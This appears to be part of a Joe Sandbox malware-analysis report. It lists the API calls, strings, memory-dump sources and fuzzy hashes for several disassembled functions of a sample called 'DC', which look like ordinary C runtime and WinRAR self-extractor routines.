Download Yara Rule

APIs

Part of subcall function 00BFC868: _free.LIBCMT ref: 00BFC891

_free.LIBCMT ref: 00BFC8F2

Part of subcall function 00BF8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00BFC896,00C03A34,00000000,00C03A34,00000000,?,00BFC8BD,00C03A34,00000007,00C03A34,?,00BFCCBA,00C03A34), ref: 00BF8DE2
Part of subcall function 00BF8DCC: GetLastError.KERNEL32(00C03A34,?,00BFC896,00C03A34,00000000,00C03A34,00000000,?,00BFC8BD,00C03A34,00000007,00C03A34,?,00BFCCBA,00C03A34,00C03A34), ref: 00BF8DF4

_free.LIBCMT ref: 00BFC8FD
_free.LIBCMT ref: 00BFC908
_free.LIBCMT ref: 00BFC95C
_free.LIBCMT ref: 00BFC967
_free.LIBCMT ref: 00BFC972
_free.LIBCMT ref: 00BFC97D

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
Instruction ID: 5137776630090893f90a440fa5730cdc1b21a4d16ee48444a71ba30cdc9ea54c
Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
Instruction Fuzzy Hash: 45113D71580B0CAAE620B7B1CD07FFB7BEC9F01B40F404C69B39D67092DA65A94D9750

Function 00BEE5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00BEE669,00BEE5CC,00BEE86D), ref: 00BEE605
GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00BEE61B
GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00BEE630

Strings

ReleaseSRWLockExclusive, xrefs: 00BEE625
KERNEL32.DLL, xrefs: 00BEE600
AcquireSRWLockExclusive, xrefs: 00BEE615

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 667068680-1718035505
Opcode ID: 8af1fa324bf7383992ffb250928b31d8334516138315b5f6da97ff4278f1ee51
Instruction ID: 42e40e1b373a66e80875573567d66e887ffb632be666e96de6da4b6ff12c7833
Opcode Fuzzy Hash: 8af1fa324bf7383992ffb250928b31d8334516138315b5f6da97ff4278f1ee51
Instruction Fuzzy Hash: 5DF0F0317A16E29F8F214FA76C84B6B32DCEE26745B1508B9ED25D3190EB20CD58DB90

Function 00BE146A Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32(?,?), ref: 00BE14C2

Part of subcall function 00BDB146: GetVersionExW.KERNEL32(?), ref: 00BDB16B

LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00BE14E6
FileTimeToSystemTime.KERNEL32(?,?), ref: 00BE1500
TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00BE1513
SystemTimeToFileTime.KERNEL32(?,?), ref: 00BE1523
SystemTimeToFileTime.KERNEL32(?,?), ref: 00BE1533

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: 96dd5ae746777723bec0ef9b96582892acbd5fb0a7ed9d801dbbf2c0d7d79739
Instruction ID: 78476dc1d625b76144cc53a0830fd109a03bff037748c5c126d1ff6ac27db596
Opcode Fuzzy Hash: 96dd5ae746777723bec0ef9b96582892acbd5fb0a7ed9d801dbbf2c0d7d79739
Instruction Fuzzy Hash: 5C31E675108346ABC704DFA9C884A9FB7E8BF9C714F004A1AF995C3210E734D509CBA6

Function 00BF2AFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00BF2AF1,00BF02FC,00BEFA34), ref: 00BF2B08
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00BF2B16
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00BF2B2F
SetLastError.KERNEL32(00000000,00BF2AF1,00BF02FC,00BEFA34), ref: 00BF2B81

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 0a068b0ff8d9790eae31156a54d8df976a8af3f30c86eaa78920e9694cc28783
Instruction ID: ace969c551b9d24dc63a6f7bb13e98cbdaf538b11b7c75565c79dba902a604f6
Opcode Fuzzy Hash: 0a068b0ff8d9790eae31156a54d8df976a8af3f30c86eaa78920e9694cc28783
Instruction Fuzzy Hash: 2D01D43624D31D6EEA142B787C85B7A2BE9EF01B74B610BB9FB10570E2EF114C08D144

Function 00BF97E5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00C11030,00BF4674,00C11030,?,?,00BF3F73,00000050,?,00C11030,00000200), ref: 00BF97E9
_free.LIBCMT ref: 00BF981C
_free.LIBCMT ref: 00BF9844
SetLastError.KERNEL32(00000000,?,00C11030,00000200), ref: 00BF9851
SetLastError.KERNEL32(00000000,?,00C11030,00000200), ref: 00BF985D
_abort.LIBCMT ref: 00BF9863

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 72411c3e0c80585f2c34115c42738b370cbdeead6ca1ab81d1252e05d421e56b
Instruction ID: c773be0fbc737cc0204e897eb7a7116d06a7d990cb050a650a159b9106589396
Opcode Fuzzy Hash: 72411c3e0c80585f2c34115c42738b370cbdeead6ca1ab81d1252e05d421e56b
Instruction Fuzzy Hash: 5BF0A43614061966C7123328BC4AB3F2AE9CFD27F5F3501B8F71893192FE24880DC565

Function 00BEDC3B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,0000000A), ref: 00BEDC47
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00BEDC61
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00BEDC72
TranslateMessage.USER32(?), ref: 00BEDC7C
DispatchMessageW.USER32(?), ref: 00BEDC86
WaitForSingleObject.KERNEL32(?,0000000A), ref: 00BEDC91

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: Message$ObjectSingleWait$DispatchPeekTranslate
String ID:
API String ID: 2148572870-0
Opcode ID: 49419717015329ce073e85b80d8927e8ddd6d94275382f5436b2cd0a8132eddd
Instruction ID: 4a137cd92e767079b48f1f6a87ed5b23ecbf220b554a2768844b14ae2bc02840
Opcode Fuzzy Hash: 49419717015329ce073e85b80d8927e8ddd6d94275382f5436b2cd0a8132eddd
Instruction Fuzzy Hash: 8AF04F72A01299BBCB206BA5DC4CFCF7FBDEF41791B104011F50AD2060D675D646C7A0

Function 00BDC0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 00BE05DA: _wcslen.LIBCMT ref: 00BE05E0

Part of subcall function 00BDB92D: _wcsrchr.LIBVCRUNTIME ref: 00BDB944

_wcslen.LIBCMT ref: 00BDC197
_wcslen.LIBCMT ref: 00BDC1DF

Strings

.sfx, xrefs: 00BDC11A
.exe, xrefs: 00BDC10B
.rar, xrefs: 00BDC0E1, 00BDC134

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: _wcslen$_wcsrchr
String ID: .exe$.rar$.sfx
API String ID: 3513545583-31770016
Opcode ID: 814cb8b037cdb4c9690e311dc28f90a19b4fa3e6cdf9620c601382077f57db2e
Instruction ID: 59594a9415c9335bf80dea46f2b8643369d28cab3e0cf3aff2958ec03a42ca86
Opcode Fuzzy Hash: 814cb8b037cdb4c9690e311dc28f90a19b4fa3e6cdf9620c601382077f57db2e
Instruction Fuzzy Hash: 904114225413A295C732AF648852E7AFBE8EF51744F1449CFF982AB281FB604D81C395

Function 00BECE87 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000800,?), ref: 00BECE9D

Part of subcall function 00BDB690: _wcslen.LIBCMT ref: 00BDB696

_swprintf.LIBCMT ref: 00BECED1

Part of subcall function 00BD4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BD40A5

SetDlgItemTextW.USER32(?,00000066,00C1946A), ref: 00BECEF1
EndDialog.USER32(?,00000001), ref: 00BECFFE

Strings

%s%s%u, xrefs: 00BECEC6

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
String ID: %s%s%u
API String ID: 110358324-1360425832
Opcode ID: f02b2ae117f112f45cd170ca1791e590a84d0784557e261928cb4426f1f3f114
Instruction ID: 030a5417082dcb89b268a8c1fa5ed7cc995fe1691672ff541a5705ae37c68771
Opcode Fuzzy Hash: f02b2ae117f112f45cd170ca1791e590a84d0784557e261928cb4426f1f3f114
Instruction Fuzzy Hash: 02416EB1900298AADF219B51CC95FEE77FCEB05300F4080E6F909E7151EBB09A85CF65

Function 00BDBB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00BDBB27
GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00BDA275,?,?,00000800,?,00BDA23A,?,00BD755C), ref: 00BDBBC5
_wcslen.LIBCMT ref: 00BDBC3B

Strings

UNC, xrefs: 00BDBBA7
\\?\, xrefs: 00BDBB52, 00BDBB99, 00BDBBF7, 00BDBC4E

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: _wcslen$CurrentDirectory
String ID: UNC$\\?\
API String ID: 3341907918-253988292
Opcode ID: 0fa8594239e85cf98a2eaee5fa3013a0e9aeadeaf5b56734e732fb9f0cb3de5d
Instruction ID: 763aa233fd2a1b53182c54f3cf6d6a0548c6ab0521ecf4f6c6fe6460fffe6ddc
Opcode Fuzzy Hash: 0fa8594239e85cf98a2eaee5fa3013a0e9aeadeaf5b56734e732fb9f0cb3de5d
Instruction Fuzzy Hash: E0418B35410259FACF21AF21CC41EEAB7E9FF45790F1944A7F915A3251FBB09A90CB60

Function 00BEB6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

LoadBitmapW.USER32(00000065), ref: 00BEB6ED
GetObjectW.GDI32(00000000,00000018,?), ref: 00BEB712
DeleteObject.GDI32(00000000), ref: 00BEB744
DeleteObject.GDI32(00000000), ref: 00BEB767

Part of subcall function 00BEA6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00BEB73D,00000066), ref: 00BEA6D5
Part of subcall function 00BEA6C2: SizeofResource.KERNEL32(00000000,?,?,?,00BEB73D,00000066), ref: 00BEA6EC
Part of subcall function 00BEA6C2: LoadResource.KERNEL32(00000000,?,?,?,00BEB73D,00000066), ref: 00BEA703
Part of subcall function 00BEA6C2: LockResource.KERNEL32(00000000,?,?,?,00BEB73D,00000066), ref: 00BEA712
Part of subcall function 00BEA6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00BEB73D,00000066), ref: 00BEA72D
Part of subcall function 00BEA6C2: GlobalLock.KERNEL32(00000000), ref: 00BEA73E
Part of subcall function 00BEA6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00BEA762
Part of subcall function 00BEA6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00BEA7A7
Part of subcall function 00BEA6C2: GlobalUnlock.KERNEL32(00000000), ref: 00BEA7C6
Part of subcall function 00BEA6C2: GlobalFree.KERNEL32(00000000), ref: 00BEA7CD

Strings

], xrefs: 00BEB71A

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
String ID: ]
API String ID: 1797374341-3352871620
Opcode ID: 2abee1a638ac12d7220257af01a8716e4af3daacf3c061712029373a4d25e0db
Instruction ID: 41650a791973730e5f8cfd7bda2b34edf3f8903dc55a9fff27554e4cb1bc301b
Opcode Fuzzy Hash: 2abee1a638ac12d7220257af01a8716e4af3daacf3c061712029373a4d25e0db
Instruction Fuzzy Hash: 5F01CC36900291ABD7127B769C49FBF7AFEAFC1B52F080091F900A7291DF258D0942B2

Function 00BED600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00BD1316: GetDlgItem.USER32(00000000,00003021), ref: 00BD135A
Part of subcall function 00BD1316: SetWindowTextW.USER32(00000000,00C035F4), ref: 00BD1370

EndDialog.USER32(?,00000001), ref: 00BED64B
GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00BED661
SetDlgItemTextW.USER32(?,00000066,?), ref: 00BED675
SetDlgItemTextW.USER32(?,00000068), ref: 00BED684

Strings

RENAMEDLG, xrefs: 00BED618

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: RENAMEDLG
API String ID: 445417207-3299779563
Opcode ID: 30676164e8c07198ead8f3d4e9c75f25d8bb3b4eddb76fe02e15d87059246389
Instruction ID: a72d8fbe9c48d0ed5cfa20ce704559b981ba6477c83501c1d02c7a64ddbdfdd4
Opcode Fuzzy Hash: 30676164e8c07198ead8f3d4e9c75f25d8bb3b4eddb76fe02e15d87059246389
Instruction Fuzzy Hash: 3801B533394294BED2214F659E09F5F77ADEB5AB01F110465F205A60D0C7E299058B69

Function 00BF7E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00BF7E24,00000000,?,00BF7DC4,00000000,00C0C300,0000000C,00BF7F1B,00000000,00000002), ref: 00BF7E93
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00BF7EA6
FreeLibrary.KERNEL32(00000000,?,?,?,00BF7E24,00000000,?,00BF7DC4,00000000,00C0C300,0000000C,00BF7F1B,00000000,00000002), ref: 00BF7EC9

Strings

CorExitProcess, xrefs: 00BF7E9E
mscoree.dll, xrefs: 00BF7E8C

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9bb8d883c849316c881d82bc57e33e34c5be0a629b639c8f5ee372506a4bd781
Instruction ID: 6386e4f468d946c8876af695dd94c971f52c68a63c64fe79d3b33cb33eabbe7e
Opcode Fuzzy Hash: 9bb8d883c849316c881d82bc57e33e34c5be0a629b639c8f5ee372506a4bd781
Instruction Fuzzy Hash: A9F04F31A40218BBDB119FA4DC09BAEBFB8EB44715F0140EAF805A22A0DF309E44CA90

Function 00BDF2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00BE081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00BE0836
Part of subcall function 00BE081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00BDF2D8,Crypt32.dll,00000000,00BDF35C,?,?,00BDF33E,?,?,?), ref: 00BE0858

GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00BDF2E4
GetProcAddress.KERNEL32(00C181C8,CryptUnprotectMemory), ref: 00BDF2F4

Strings

CryptUnprotectMemory, xrefs: 00BDF2EA
Crypt32.dll, xrefs: 00BDF2CE
CryptProtectMemory, xrefs: 00BDF2DE

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
API String ID: 2141747552-1753850145
Opcode ID: 0cd5bd95087a2f2045eee521789e6b2d2c3c795bc4230fb6fca92986d81afa83
Instruction ID: c1fe4a2d87b12ed828704758d60d5b0191bbf8b2675900dc116efbeae878d96f
Opcode Fuzzy Hash: 0cd5bd95087a2f2045eee521789e6b2d2c3c795bc4230fb6fca92986d81afa83
Instruction Fuzzy Hash: F3E08670A15782AEC7209F75984DB15BBDCAF04714F15887FF0DA93680D7B4D580CB50

Function 00BF2BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00BF2CA1
___AdjustPointer.LIBCMT ref: 00BF2CC4
_abort.LIBCMT ref: 00BF2D12
___AdjustPointer.LIBCMT ref: 00BF2D60

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: AdjustPointer$_abort
String ID:
API String ID: 2252061734-0
Opcode ID: 8421bd5c82009280a36320477d495698293b6ffb69de5bb6620dfec114d204c8
Instruction ID: ba09c7c3ea4131675257b9c1d0859d8a7477d0a2c296da0e08b5a24a53923c8c
Opcode Fuzzy Hash: 8421bd5c82009280a36320477d495698293b6ffb69de5bb6620dfec114d204c8
Instruction Fuzzy Hash: C651047660121EAFEB289F18D885BBA77E4FF54310F2441ADEE01476A1D731ED48DB90

Function 00BFBF30 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00BFBF39
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00BFBF5C

Part of subcall function 00BF8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00BFCA2C,00000000,?,00BF6CBE,?,00000008,?,00BF91E0,?,?,?), ref: 00BF8E38

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00BFBF82
_free.LIBCMT ref: 00BFBF95
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00BFBFA4

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
